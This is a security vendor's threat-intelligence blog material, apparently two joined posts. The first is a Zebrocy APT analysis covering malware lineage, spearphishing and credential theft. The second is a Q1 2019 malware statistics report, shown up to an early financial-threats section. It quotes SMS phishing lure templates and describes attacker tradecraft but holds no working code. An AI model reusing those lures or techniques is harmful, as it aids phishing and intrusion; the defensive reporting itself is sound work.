When we originally documented a Zebrocy malware incident in late 2015, we noted an Oct 2015 AutoIT downloader and a Delphi backdoor payload. Since then, we have noted a virtual salad of Zebrocy code tossed together, built with a handful of languages, often ripped from various code sharing sites. Zebrocy activity initiates with spearphishing operations delivering various target profilers and downloaders without the use of any 0day exploits. Browser credential theft, keylogging, and Windows credential theft, along with some incidents of file and communications theft, are all on the list of Zebrocy second stage implant specials.

This Zebrocy dish is served before the main course – gaining and maintaining access is not an easy job. And, because the group seems to maintain lineage in both the 0day capable and destructive BlackEnergy/Sandworm APT and the prolific and 0day capable Sofacy APT, this course is very interesting. Let’s take a more intelligent perspective on the Zebrocy malware set and activity and its lineage, based on reporting provided to our private report customers covering the past five years.

It’s important to note that Zebrocy-related spearphishing activity continued into April 2019, in the week prior to SAS2019. Recent changes to its Go downloader variant make it clear that the Zebrocy malware set is still under active development. And observed activity continued into late May 2019. This activity is likely to continue throughout 2019.

Since the SAS2019 presentation, we have identified a new Zebrocy backdoor family, deployed with a new downloader. So Zebrocy continues to expand its malware set. There appears to be both a return to C coding for the group, and also an expansion with the Nim language in its arsenal. We will post a more thorough analysis and reference indicators to Securelist in the near future about this downloader, but we expect other vendors to see it as well. Zebrocy spearphished a fairly long list of targets throughout the world with a new Nim downloader, and here is a partial list of detection geolocations:

  • Kazakhstan
  • Tajikistan
  • Turkmenistan
  • Germany
  • Kyrgyzstan
  • United Kingdom
  • Myanmar
  • Syrian Arab Republic
  • Ukraine
  • Afghanistan
  • Tanzania
  • Iran
Setting a Zebrocy place

A relevant confluence of factors over the past five years is notable in regards to the group’s lineage. The Zebrocy Delphi payload arrived at the abrupt end of the two year Delphocy Delphi based campaign. And it’s important to note that this Delphocy Delphi backdoor was delivered alongside bootkit kernel loader components that maintained the same unique code as the BlackEnergy malware kernel loader. And overall, the malware set is innovative when compared to Sofacy, and maintains ongoing unexpected malware artefact similarities with BlackEnergy.

A set of Zebrocy related events best characterize years of the activity and help to carve out the group’s own profile, its lineage, malware set, infrastructure, and modus operandi.

  • Zebrocy lineage – early Sofacy infrastructure overlap (late 2015/early 2016) for the Zebrocy Delphi backdoor
  • Zebrocy lineage – Delphocy Delphi deployment and abrupt conclusion (2013 – late 2015), and start of Zebrocy Delphi timeline (late 2015)
  • Zebrocy lineage – shared, unique kernel code between BlackEnergy and Delphocy bootkit (2013 – 2015)
  • Zebrocy unique malware set – vintage Delphi programming coupled with unusual and agile development capabilities with new managed languages like Python, C#, and Go all perform screengrab anchor, volume serial number id, systeminfo and process list collection
  • Zebrocy ongoing targeting and infrastructure overlap – fairly recent BlackEnergy/GreyEnergy
  • Zebrocy matching spearphish macro artefact overlap – recent Turla

When we first reported on the Zebrocy package in early October 2015, this activity was not quite Sofacy and not quite BlackEnergy. Zebrocy spearphished diplomatic targets with a compiled AutoIT script that downloaded a new Delphi payload. This payload was unusual, as only the Delphocy backdoors and Madi backdoors from 2012 were well known APT related Delphi malware – Delphi programming itself is an unusually older skill. These malware artefacts, and campaign events suggested ties in the malware to BlackEnergy, while overlap in infrastructure suggested ties to Sofacy.

SAS2018 Claims and Predictions

Last year’s SAS2018 “Masha and these Bears” presentation focused on SPLM/XAgent Sofacy activity, but included mention of Zebrocy due to targeting overlap and shared interests. It was first to record and predict several items:

  • The full 2018 decline of SPLM/XAgent for the more traditional “Sofacy” activity
  • A coincidental new increase in Zebrocy activity
  • Shared build-id format with BlackEnergy modules
  • An expansion in Zebrocy spearphishing
  • An expansion in the managed languages the Zebrocy malware set is built on

These predictions later turned into global events, as lighter targeting turned into a massive global surge of Zebrocy activity, sometimes sharing targets between both Sofacy and Zebrocy. Also later that year, the Zebrocy malware set expanded with C#, Python, and Go. This wouldn’t be the first or last time we reported on this group’s innovative malware set.

Zebrocy Delphi backdoor shared artefacts rooted in Delphocy and BlackEnergy

The limited set of 2013-2015 Delphocy intrusions in Ukraine and Poland deployed a Delphi backdoor both with and without a bootkit loader. This bootkit loader included a routine that shares the same compiled code with only the BlackEnergy kernel loaders, helping to tie Zebrocy malware to the BlackEnergy malware set.

This unique encryption implementation was shared between BlackEnergy’s kernel loader, and Delphocy’s bootkit kernel loader code. The appearance of this code overlap coincides with several project events:

  • End of Delphocy/BlackEnergy overlapped code use, while BlackEnergy moved forward with other code
  • End of Delphocy’s user-mode Delphi payload (October 2015)
  • Start of Zebrocy’s Delphi payload (October 2015)

A particular chunk of kernel mode code for a custom encryption routine was shared across the older Delphocy bookit and the BlackEnergy malware platform in 2013. While Delphocy replaced this bootkit with a simplified user-mode persistence technique, BlackEnergy malware continued using this code until late 2015. Then, these APTs discontinued both the Delphi-based Delphocy project and the use of this mysterious chunk of code within BlackEnergy malware. Almost immediately, Delphi-based Zebrocy backdoors began to be deployed. Several months later, a Zebrocy backdoor connected back to a domain that was registered by a particular email address. This address had been used to register another Sofacy domain hosted on a well-known Sofacy IP at the time (rammatica[.]com/raveston[.]com).

Note that both Delphocy’s and BlackEnergy’s kernel mode code appropriated unique content in 2013 from the Carberp codebase – hashing, injection, bootkit functionality. Surprisingly, this same unique encryption cipher was seen pasted again into 2018 VPNFilter code as well. Clearly it happens with other malware, but Zebrocy’s consistent copy/paste tendency is something not frequently seen in other APT malware with a “best use” date spanning five years or more. Portions of its AutoIT code were copied from code sharing forums and pasted into their own code. This is different from Sofacy’s disappeared and exhaustive SPLM/XAgent codebase. It was used for at least six years and was entirely custom-built.

Zebrocy’s mix

The Zebrocy malware set is tossed together from a wide set of languages and technologies, including both legitimate and malicious code shared on online forums and sites like Github and Pastebin. This repeated “copy/paste” practice is not frequently seen in Russian speaking APT malware sets, although open source and penetration testing/red teaming malware are frequently used by other groups, like Empire, Responder, BeEF, and Mimikatz. Also unusual, this Zebrocy malware assortment is frequently rebuilt on multiple languages, along with new malware components added to the mix.

  • AutoIT
  • Delphi
  • C#
  • PowerShell
  • Go
  • Python
  • Nim
AutoIT component

The group emailed zipped AutoIT attachments to at least a dozen targets in the first wave of Zebrocy spearphishing in early October 2015. The group is fairly successful in convincing recipients to open the attachments; generally around half of recipients attempted to open them. The AutoIT code is a target profiling component and downloader. It appears to have been developed with copy and paste coding talent from AutoIT scripting forums, Github, etc, tossed together from multiple sources. Here are a few:

The AutoIT executable contains over 60 functions listed in the script, with 10 of the most interesting functions listed here. The same initial profiling functionality is maintained almost four years later in various newer Go and C# downloader variants, with screengrabs, system info and running process collection built into the startup routine of each one. Unique victim ID’s, for example, are based on target systems’ volume serial number and collected and reported to its C2 in its initial connectback for ongoing tracking.

C# Zebrocy backdoor

Zebrocy pushed a C# backdoor that maintains much the same functionality as its other assortment of backdoor implementations.

Most interesting in this implementation is its consistent collection of screengrab and system information, and a list of running processes. Again, with this first stage backdoor, it is profiling its targets and looking for unexpected sources of credential collection to develop bespoke second stage credential harvesters against.

Delphi backdoor

The Zebrocy Delphi backdoor has been publicly documented fairly well, but its artefacts may have a more interesting part in the Zebrocy story.  Because of the unusual ongoing presence of Delphi backdoors in its malware set, early Zebrocy roots appear to be planted in Delphocy malware deployed to Ukraine and Poland targets from early 2013 to late 2015. Also interesting is the unique encryption cipher implemented in both the 2013 Delphocy bootkit kernel mode loader and the BlackEnergy kernel modules, along with simple API hashing functions that both shared with Carberp. While Delphocy was deployed for a second version without the bootkit in 2015, the BlackEnergy platform continued to deploy with the shared kernel loader code until late 2015.

It does not seem to be merely coincidental that the very last of the BlackEnergy kernel mode components sharing this code with the Delphocy-related kernel loaders wilted at the very end of 2015 along with the Delphocy campaigns altogether. This came after the Delphocy project delivered a second round of Delphi variants without the bootkit loader. Meanwhile, Zebrocy Delphi variants grew from the initial row of Zebrocy Delphi implants in October 2015. While it is a loose connection, it seems more than just coincidental to observe unusual Delphi coding end with one activity set and begin with another activity set.


The group’s Go backdoors continued to be modified and deployed into late March 2019. These backdoors also include a large amount of code included from external sources. They also include the screengrab and system information collection, along with running process enumeration in order to profile targets and further inform their second stage credential harvesting efforts. Zebrocy Go backdoors have been sent out in waves over the past year, maintaining a variety of project strings seen below.

A second stage

These findings were particularly interesting in the light of past claims about SPLM/XAgent being the second stage of choice for Zebrocy, for which there was a lot of monitoring on our part, but never any data support. Some guesses were made about why that was, perhaps Zebrocy downloaders were all mitigated prior to attempting to download further stages? But never any answers.

Instead, we arrived at the answers ourselves. In order to account for unexpected software installations at victim systems, no matter which language, each first stage backdoor implementation collects a “system information” listing, screengrab, and enumerates running processes. This malware behavior was included in Zebrocy backdoors from the very first backdoor that we reported on, and continued into 2019 with the latest rounds of Go backdoors. After collected information is POSTed to the C2, a long delay ensues. Eventually, target systems may receive a custom built second stage implant to retrieve credentials from those unexpected software sources. More unusual software packages included little-known customized Chromium builds like CentBrowser and 7Star from Asian studios. In some cases, malware password stealers are deployed to address more common software.

In addition, Zebrocy file content stealers and keyloggers coded in C# were detected at targets in 2017 and 2018. Some of this code and their build id value format was reviewed in the SAS2018 “Masha and these Bears” presentation.

Served cold

Zebrocy version 2.2 called back to a domain sharing Whois and hosting resources with Sofacy in early 2016, and later versions used naming and URL constructs very similar to BlackEnergy resources. And since then, just like BlackEnergy, mostly all of the Zebrocy C2 used no domain registrations. Communications directly to the host over IPv4 with no domain resolution are common behavior for the group’s malware. However, every now and then, Zebrocy malware calls back to servers located by hardcoded domain names.

Its ongoing activity demonstrates a long game commitment to gaining access to targeted networks. And as we predicted at SAS2018 and SAS2019, this latest new Nim coding adds to the growing list of languages for this malware set. We will see more from Zebrocy into 2019 on government and military related organizations.

2019. május 23.

IT threat evolution Q1 2019. Statistics

These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data.

Quarterly figures

According to Kaspersky Security Network,

  • Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources in 203 countries across the globe.
  • 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.
  • Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 243,604 users.
  • Ransomware attacks were defeated on the computers of 284,489 unique users.
  • Our File Anti-Virus detected 247,907,593 unique malicious and potentially unwanted objects.
  • Kaspersky Lab products for mobile devices detected:
    • 905,174 malicious installation packages
    • 29,841 installation packages for mobile banking Trojans
    • 27,928 installation packages for mobile ransomware Trojans
Mobile threats Quarterly highlights

Q1 2019 is remembered mainly for mobile financial threats.

First, the operators of the Russia-targeting Asacub Trojan made several large-scale distribution attempts, reaching up to 13,000 unique users per day. The attacks used active bots to send malicious links to contacts in already infected smartphones. The mailings contained one of the following messages:

{Name of victim}, you received a new mms: ____________________________ from {Name of victim’s contact}
{Name of victim}, the mms: smsfn.pro/3ftjR was received from {Name of victim’s contact}
{Name of victim}, photo: smslv.pro/c0Oj0 received from {Name of victim’s contact}
{Name of victim}, you have an mms notification ____________________________ from {Name of victim’s contact}

Second, the start of the year saw a rise in the number of malicious apps in the Google Play store aimed at stealing credentials from users of Brazilian online banking apps.

Although such malware appeared on the most popular app platform, the number of downloads was extremely low. We are inclined to believe that cybercriminals are having problems luring victims to pages with malicious apps.

Mobile threat statistics

In Q1 2019, Kaspersky Lab detected 905,174 malicious installation packages, which is 95,845 packages down on the previous quarter.

Number of detected malicious installation packages, Q2 2018 – Q1 2019

Distribution of detected mobile apps by type

Distribution of newly detected mobile apps by type, Q4 2018 and Q1 2019

Among all the threats detected in Q1 2019, the lion’s share went to potentially unsolicited RiskTool apps with 29.80%, a fall of 19 p.p. against the previous quarter. The most frequently encountered objects came from the RiskTool.AndroidOS.Dnotua (28% of all detected threats of this class), RiskTool.AndroidOS.Agent (27%), and RiskTool.AndroidOS.SMSreg (16%) families.

In second place were threats in the Trojan-Dropper class (24.93%), whose share increased by 13 p.p. The vast majority of files detected belonged to the Trojan-Dropper.AndroidOS.Wapnor families (93% of all detected threats of this class). Next came the Trojan-Dropper.AndroidOS.Agent (3%) and Trojan-Dropper.AndroidOS.Hqwar (2%) families, and others.

The share of advertising apps (adware) doubled compared to Q4 2018. The AdWare.AndroidOS.Agent (44.44% of all threats of this class), AdWare.AndroidOS.Ewind (35.93%), and AdWare.AndroidOS.Dnotua (4.73%) families were the biggest contributors.

The statistics show a significant rise in the number of mobile financial threats in Q1 2019. If in Q4 2018 the share of mobile banking Trojans was 1.85%, in Q1 2019 the figure stood at 3.24% of all detected threats.

The most frequently created objects belonged to the Trojan-Banker.AndroidOS.Svpeng (20% of all detected mobile bankers), Trojan-Banker.AndroidOS.Asacub (18%), and Trojan-Banker.AndroidOS.Agent (15%) families.

Top 20 mobile malware programs

Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware.

Verdict %* 1 DangerousObject.Multi.Generic 54.26 2 Trojan.AndroidOS.Boogr.gsh 12.72 3 Trojan-Banker.AndroidOS.Asacub.snt 4.98 4 DangerousObject.AndroidOS.GenericML 4.35 5 Trojan-Banker.AndroidOS.Asacub.a 3.49 6 Trojan-Dropper.AndroidOS.Hqwar.bb 3.36 7 Trojan-Dropper.AndroidOS.Lezok.p 2.60 8 Trojan-Banker.AndroidOS.Agent.ep 2.53 9 Trojan.AndroidOS.Dvmap.a 1.84 10 Trojan-Banker.AndroidOS.Svpeng.q 1.83 11 Trojan-Banker.AndroidOS.Asacub.cp 1.78 12 Trojan.AndroidOS.Agent.eb 1.74 13 Trojan.AndroidOS.Agent.rt 1.72 14 Trojan-Banker.AndroidOS.Asacub.ce 1.70 15 Trojan-SMS.AndroidOS.Prizmes.a 1.66 16 Exploit.AndroidOS.Lotoor.be 1.59 17 Trojan-Dropper.AndroidOS.Hqwar.gen 1.57 18 Trojan-Dropper.AndroidOS.Tiny.d 1.51 19 Trojan-Banker.AndroidOS.Svpeng.ak 1.49 20 Trojan.AndroidOS.Triada.dl 1.47

* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab’s mobile security solutions that were attacked.

As is customary, first place in the Top 20 for Q1 went to the DangerousObject.Multi.Generic verdict (54.26%), which we use for malware detected using cloud technologies. Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company’s cloud already contains information about the object. This is basically how the latest malicious programs are detected.

In second place came Trojan.AndroidOS.Boogr.gsh (12.72%). This verdict is assigned to files recognized as malicious by our system based on machine learning.

Third place went to the Trojan-Banker.AndroidOS.Asacub.snt banker (4.98%). In Q1, this family was well represented in our Top 20: four positions out of 20 (3rd, 5th, 11th, 14th).

The DangerousObject.AndroidOS.GenericML verdict (4.35%), which ranked fourth in Q1, is perhaps the most interesting. It is given to files detected by machine learning. But unlike the Trojan.AndroidOS.Boogr.gsh verdict, which is assigned to malware that is processed and detected inside Kaspersky Lab’s infrastructure, the DangerousObject.AndroidOS.GenericML verdict is given to files on the side of users of the company’s security solutions before such files go for processing. The latest threat patterns are now detected this way.

Sixth and seventeenth places were taken by members of the Hqwar dropper family: Trojan-Dropper.AndroidOS.Hqwar.bb (3.36%) and Trojan-Dropper.AndroidOS.Hqwar.gen (1.57%), respectively. These packers most often contain banking Trojans, including Asacub.

Seventh position belonged to Trojan-Dropper.AndroidOS.Lezok.p (2.60%). The Lezok family is notable for its variety of distribution schemes, among them a supply chain attack, whereby the malware is sewn into the firmware of the mobile device before delivery to the store. This is very dangerous for two reasons:

  • It is extremely difficult for an ordinary user to determine whether their device is already infected.
  • Getting rid of such malware is highly complex.

The Lezok Trojan family is designed primarily to display persistent ads, sign users up for paid SMS subscriptions, and inflate counters for apps on various platforms.

The last Trojan worthy of a mention on the topic of the Top 20 mobile threats is Trojan-Banker.AndroidOS.Agent.ep. It is encountered both in standalone form and inside Hqwar droppers. The malware has extensive capabilities for countering dynamic analysis, and can detect being launched in the Android Emulator or Genymotion environment. It can open arbitrary web pages to phish for login credentials. It uses Accessibility Services to obtain various rights and interact with other apps.

Geography of mobile threats

Map of mobile malware infection attempts, Q1 2019

Top 10 countries by share of users attacked by mobile malware:

Country* %** 1 Pakistan 37.54 2 Iran 31.55 3 Bangladesh 28.38 4 Algeria 24.03 5 Nigeria 22.59 6 India 21.53 7 Tanzania 20.71 8 Indonesia 17.16 9 Kenya 16.27 10 Mexico 12.01

* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000).
** Unique users attacked in the country as a percentage of all users of Kaspersky Lab’s mobile antivirus in the country.

Pakistan (37.54%) ranked first, with the largest number of users in this country being attacked by AdWare.AndroidOS.Agent.f, AdWare.AndroidOS.Ewind.h, and AdWare.AndroidOS.HiddenAd.et adware.

Second place was taken by Iran (31.55%), which appears consistently in the Top 10 every quarter. The most commonly encountered malware in this country was Trojan.AndroidOS.Hiddapp.bn, as well as the potentially unwanted apps RiskTool.AndroidOS.Dnotua.yfe and RiskTool.AndroidOS.FakGram.a. Of these three, the latter is the most noteworthy – the main task of this app is to intercept Telegram messages. It should be mentioned that Telegram is banned in Iran, so any of its clones are in demand, as confirmed by the infection statistics.

Third place went to Bangladesh (28.38%), where in Q1 the same advertising apps were weaponized as in Pakistan.

Mobile banking Trojans

In the reporting period, we detected 29,841 installation packages for mobile banking Trojans, almost 11,000 more than in Q4 2018.

The greatest contributions came from the creators of the Trojan-Banker.AndroidOS.Svpeng (20% of all detected banking Trojans), the second-place Trojan-Banker.AndroidOS.Asacub (18%), and the third-place Trojan-Banker.AndroidOS.Agent (15%) families.

Number of installation packages for mobile banking Trojans, Q2 2018 – Q1 2019

Verdict %* 1 Trojan-Banker.AndroidOS.Asacub.snt 23.32 2 Trojan-Banker.AndroidOS.Asacub.a 16.35 3 Trojan-Banker.AndroidOS.Agent.ep 11.82 4 Trojan-Banker.AndroidOS.Svpeng.q 8.57 5 Trojan-Banker.AndroidOS.Asacub.cp 8.33 6 Trojan-Banker.AndroidOS.Asacub.ce 7.96 7 Trojan-Banker.AndroidOS.Svpeng.ak 7.00 8 Trojan-Banker.AndroidOS.Agent.eq 4.96 9 Trojan-Banker.AndroidOS.Asacub.ar 2.47 10 Trojan-Banker.AndroidOS.Hqwar.t 2.10

* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab’s mobile security solutions that were attacked by banking threats.

This time, fully half the Top 10 banking threats are members of the Trojan-Banker.AndroidOS.Asacub family: five positions out of ten. The creators of this Trojan actively distributed samples throughout Q1. In particular, the number of users attacked by the Asacub.cp Trojan reached 8,200 per day. But even this high result was surpassed by Asacub.snt with 13,000 users per day at the peak of the campaign.

It was a similar story with Trojan-Banker.AndroidOS.Agent.ep: We recorded around 3,000 attacked users per day at its peak. However, by the end of the quarter, the average daily number of attacked unique users had dropped below 1,000. Most likely, this was due not to decreased demand for the Trojan, but to cybercriminals’ transition to a two-stage system of infection using Hqwar droppers.

Geography of mobile banking threats, Q1 2019

Top 10 countries by share of users attacked by mobile banking Trojans:

Country* %** 1 Australia 0.81 2 Turkey 0.73 3 Russia 0.64 4 South Africa 0.35 5 Ukraine 0.31 6 Tajikistan 0.25 7 Armenia 0.23 8 Kyrgyzstan 0.17 9 US 0.16 10 Moldova 0.16

* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000).
** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky Lab’s mobile security solutions in this country.

In Q1 2019, Australia (0.81%) took first place in our Top 10. The most common infection attempts we registered in this country were by Trojan-Banker.AndroidOS.Agent.eq and Trojan-Banker.AndroidOS.Agent.ep. Both types of malware are not exclusive to Australia, and used for attacks worldwide.

Second place was taken by Turkey (0.73%), where, as in Australia, Trojan-Banker.AndroidOS.Agent.ep was most often detected.

Russia is in third place (0.64%), where we most frequently detected malware from the Asacub and Svpeng families.

Mobile ransomware

In Q1 2019, we detected 27,928 installation packages of mobile ransomware, which is 3,900 more than in the previous quarter.

Number of mobile ransomware installation packages detected by Kaspersky Lab (Q2 2018 – Q1 2019)

Verdict %* 1 Trojan-Ransom.AndroidOS.Svpeng.ah 28.91 2 Trojan-Ransom.AndroidOS.Rkor.h 19.42 3 Trojan-Ransom.AndroidOS.Svpeng.aj 9.46 4 Trojan-Ransom.AndroidOS.Small.as 8.81 5 Trojan-Ransom.AndroidOS.Rkor.snt 5.36 6 Trojan-Ransom.AndroidOS.Svpeng.ai 5.21 7 Trojan-Ransom.AndroidOS.Small.o 3.24 8 Trojan-Ransom.AndroidOS.Fusob.h 2.74 9 Trojan-Ransom.AndroidOS.Small.ce 2.49 10 Trojan-Ransom.AndroidOS.Svpeng.snt 2.33

* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab’s mobile security solutions that were attacked by ransomware.

In Q1 2019, the most common mobile ransomware family was Svpeng with four positions in the Top 10.

Geography of mobile ransomware, Q1 2019

Top 10 countries by share of users attacked by mobile ransomware:

Country* %** 1 US 1.54 2 Kazakhstan 0.36 3 Iran 0.28 4 Pakistan 0.14 5 Mexico 0.10 6 Saudi Arabia 0.10 7 Canada 0.07 8 Italy 0.07 9 Indonesia 0.05 10 Belgium 0.05

* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000).
** Unique users attacked by mobile ransomware as a percentage of all users of Kaspersky Lab’s mobile security solutions in this country.

The Top 3 countries by number of users attacked by mobile ransomware, as in the previous quarter, were the US (1.54%), Kazakhstan (0.36%), and Iran (0.28%)

Attacks on Apple macOS

On the topic of threats to various platforms, such a popular system as macOS cannot be ignored. Although new malware families for this platform are relatively rare, threats do exist for it, largely in the shape of adware.

The modus operandi of such apps is widely known: infect the victim, take root in the system, and show advertising banners. That said, for each ad displayed and banner clicked the attackers receive a very modest fee, so they need:

  1. The code that displays the advertising banner to run as often as possible on the infected machine,
  2. The victim to click on the banners as often as possible,
  3. As many victims as possible.

It should be noted that the adware infection technique and adware behavior on the infected machine at times differ little from malware. Meanwhile, the banners themselves can be shown in an arbitrary place on the screen at any time, be it in an open browser window, in a separate window in the center of the screen, etc.

Top 20 threats for macOS Verdict %* 1 Trojan-Downloader.OSX.Shlayer.a 24.62 2 AdWare.OSX.Spc.a 20.07 3 AdWare.OSX.Pirrit.j 10.31 4 AdWare.OSX.Pirrit.p 8.44 5 AdWare.OSX.Agent.b 8.03 6 AdWare.OSX.Pirrit.o 7.45 7 AdWare.OSX.Pirrit.s 6.88 8 AdWare.OSX.Agent.c 6.03 9 AdWare.OSX.MacSearch.a 5.95 10 AdWare.OSX.Cimpli.d 5.72 11 AdWare.OSX.Mcp.a 5.71 12 AdWare.OSX.Pirrit.q 5.55 13 AdWare.OSX.MacSearch.d 4.48 14 AdWare.OSX.Agent.a 4.39 15 Downloader.OSX.InstallCore.ab 3.88 16 AdWare.OSX.Geonei.ap 3.75 17 AdWare.OSX.MacSearch.b 3.48 18 AdWare.OSX.Geonei.l 3.42 19 AdWare.OSX.Bnodlero.q 3.33 20 RiskTool.OSX.Spigot.a 3.12

* Unique users attacked by this malware as a percentage of all users of Kaspersky Lab’s security solutions for macOS that were attacked.

Trojan-Downloader.OSX.Shlayer.a (24.62%) finished first in our ranking of macOS threats. Malware from the Shlayer family is distributed under the guise of Flash Player or its updates. Their main task is to download and install various advertising apps, including Bnodlero.

AdWare.OSX.Spc.a (20.07%) and AdWare.OSX.Mcp.a (5.71%) are typical adware apps that are distributed together with various “cleaner” programs for macOS. After installation, they write themselves to the autoloader and run in the background.

Members of the AdWare.OSX.Pirrit family add extensions to the victim’s browser; some versions also install a proxy server on the victim’s machine to intercept traffic from the browser. All this serves one purpose – to inject advertising into web pages viewed by the user.

The malware group consisting of AdWare.OSX.Agent.a, AdWare.OSX.Agent.b, and AdWare.OSX.Agent.c is closely related to the Pirrit family, since it often downloads members of the latter. It can basically download, unpack, and launch different files, as well as embed JS code with ads into web pages seen by the victim.

AdWare.OSX.MacSearch is another family of advertising apps with extensive tools for interacting with the victim’s browser. It can manipulate the browser history (read/write), change the browser search system to its own, add extensions, and embed advertising banners on pages viewed by the user. Plus, it can download and install other apps without the user’s knowledge.

AdWare.OSX.Cimpli.d (5.72%) is able to download and install other advertising apps, but its main purpose is to change the browser home page and install advertising extensions. As with other adware apps, all these actions have the aim of displaying ads in the victim’s browser.

The creators of the not-a-virus:Downloader.OSX.InstallCore family, having long perfected their tricks on Windows, transferred the same techniques to macOS. The typical InstallCore member is in fact an installer (more precisely, a framework for creating an installer with extensive capabilities) of other programs that do not form part of the main InstallCore package and are downloaded separately. Besides legitimate software, it can distribute less salubrious apps, including ones containing aggressive advertising. Among other things, InstallCore is used to distribute DivX Player.

The AdWare.OSX.Geonei family is one of the oldest adware families for macOS. It employs creator-owned obfuscation techniques to counteract security solutions. As is typical for adware programs, its main task is to display ads in the browser by embedding them in the HTML code of the web-page.

Like other similar apps, AdWare.OSX.Bnodlero.q (3.33%) installs advertising extensions in the user’s browser, and changes the default search engine and home page. What’s more, it can download and install other advertising apps.

Threat geography Country* %** 1 France 11.54 2 Spain 9.75 3 India 8.83 4 Italy 8.20 5 US 8.03 6 Canada 7.94 7 UK 7.52 8 Russia 7.51 9 Brazil 7.45 10 Mexico 6.99

* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s security solutions for macOS (under 10,000).
** Unique attacked users as a percentage of all users of Kaspersky Lab’s security solutions for macOS in the country.

In Q1 2019, France (11.54%) took first place in the Top 10. The most common infection attempts we registered in this country came from Trojan-Downloader.OSX.Shlayer.a, AdWare.OSX.Spc.a и AdWare.OSX.Bnodlero.q.

Users from Spain (9.75%), India (8.83%), and Italy (8.20%) – who ranked second, third, and fourth, respectively – most often encountered Trojan-Downloader.OSX.Shlayer.a, AdWare .OSX.Spc.a, AdWare.OSX.Bnodlero.q, AdWare.OSX.Pirrit.j, and AdWare.OSX.Agent.b

Fifth place in the ranking went to the US (8.03%), which saw the same macOS threats as Europe. Note that US residents also had to deal with advertising apps from the Climpi family.

IoT attacks Interesting events

In Q1 2019, we noticed several curious features in the behavior of IoT malware. First, some Mirai samples were equipped with a tool for artificial environment detection: If the malware detected it was running in a sandbox, it stopped working. The implementation was primitive – scanning for the presence of procfs.

But we expect it to become more complex in the near future.

Second, one of the versions of Mirai was spotted to contain a mechanism for clearing the environment of other bots. It works using templates, killing the process if its name matches that of the template. Interestingly, Mirai itself ended up in the list of such names (the malware itself does not contain “mirai” in the process name):

  • dvrhelper
  • dvrsupport
  • mirai
  • blade
  • demon
  • hoho
  • hakai
  • satori
  • messiah
  • mips

Lastly, a few words about a miner with an old exploit for Oracle Weblogic Server, although it is not actually an IoT malware, but a Trojan for Linux.

Taking advantage of the fact that Weblogic Server is cross-platform and can be run on a Windows host or under Linux, the cybercriminals embedded checks for different operating systems, and are now attacking Windows hosts along with Linux.

Section of code responsible for attacking Windows and Linux hosts

IoT threat statistics

Q1 demonstrated that there are still many devices in the world that attack each other through telnet. Note, however, that it has nothing to do with the qualities of the protocol. It is just that devices or servers managed through SSH are closely monitored by administrators and hosting companies, and any malicious activity is terminated. This is one reason why there are significantly fewer unique addresses attacking via SSH than there are IP addresses from which the telnet attacks come.

SSH 17% Telnet 83%

Table of the popularity distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2019

Nevertheless, cybercriminals are actively using powerful servers to manage their vast botnets. This is seen by the number of sessions in which cybercriminal servers interact with Kaspersky Lab’s traps.

SSH 64% Telnet 36%

Table of distribution of cybercriminal working sessions with Kaspersky Lab’s traps, Q1 2019

If attackers have SSH access to an infected device, they have far greater scope to monetize the infection. In the overwhelming majority of cases involving intercepted sessions, we registered spam mailings, attempts to use our trap as a proxy server, and (least often of all) cryptocurrency mining.

Telnet-based attacks

Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab’s telnet traps, Q1 2019

Top 10 countries where devices were located that carried out telnet-based attacks on Kaspersky Lab’s traps.

Country %* 1 Egypt 13.46 2 China 13.19 3 Brazil 11.09 4 Russia 7.17 5 Greece 4.45 6 Jordan 4.14 7 US 4.12 8 Iran 3.24 9 India 3.14 10 Turkey 2.49

* Infected devices in the country as a percentage of the total number of all infected IoT devices attacking via telnet.

In Q1 2019, Egypt (13.46%) topped the leaderboard by number of unique IP addresses from which attempts were made to attack Kaspersky Lab’s traps. Second place by a small margin goes to China (13.19%), with Brazil (11.09%) in third.

Cybercriminals most often used telnet attacks to infect devices with one of the many Mirai family members.

Top 10 malware downloaded to infected IoT devices following a successful telnet attack

Verdict %* 1 Backdoor.Linux.Mirai.b 71.39 2 Backdoor.Linux.Mirai.ba 20.15 3 Backdoor.Linux.Mirai.au 4.85 4 Backdoor.Linux.Mirai.c 1.35 5 Backdoor.Linux.Mirai.h 1.23 6 Backdoor.Linux.Mirai.bj 0.72 7 Trojan-Downloader.Shell.Agent.p 0.06 8 Backdoor.Linux.Hajime.b 0.06 9 Backdoor.Linux.Mirai.s 0.06 10 Backdoor.Linux.Gafgyt.bj 0.04

* Share of malware in the total amount of malware downloaded to IoT devices following a successful telnet attack

It is worth noting that bots based on Mirai code make up most of the Top 10. There is nothing surprising about this, and the situation could persist for a long time given Mirai’s universality.

SSH-based attacks

Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab’s SSH traps, Q1 2019

Top 10 countries in which devices were located that carried out SSH-based attacks on Kaspersky Lab’s traps.

Verdict %* 1 China 23.24 2 US 9.60 3 Russia 6.07 4 Brazil 5.31 5 Germany 4.20 6 Vietnam 4.11 7 France 3.88 8 India 3.55 9 Egypt 2.53 10 Korea 2.10

* Infected devices in the country as a percentage of the total number of infected IoT devices attacking via SSH

Most often, a successful SSH-based attack resulted in the following types of malware downloaded of victim’s device: Backdoor.Perl.Shellbot.cd, Backdoor.Perl.Tsunami.gen, and Trojan-Downloader.Shell.Agent.p

Financial threats Quarterly highlights

The banker Trojan DanaBot, detected in Q2, continued to grow actively. The new modification not only updated the communication protocol with the C&C center, but expanded the list of organizations targeted by the malware. Whereas last quarter the main targets were located in Australia and Poland, in Q3 organizations in Austria, Germany, and Italy were added.

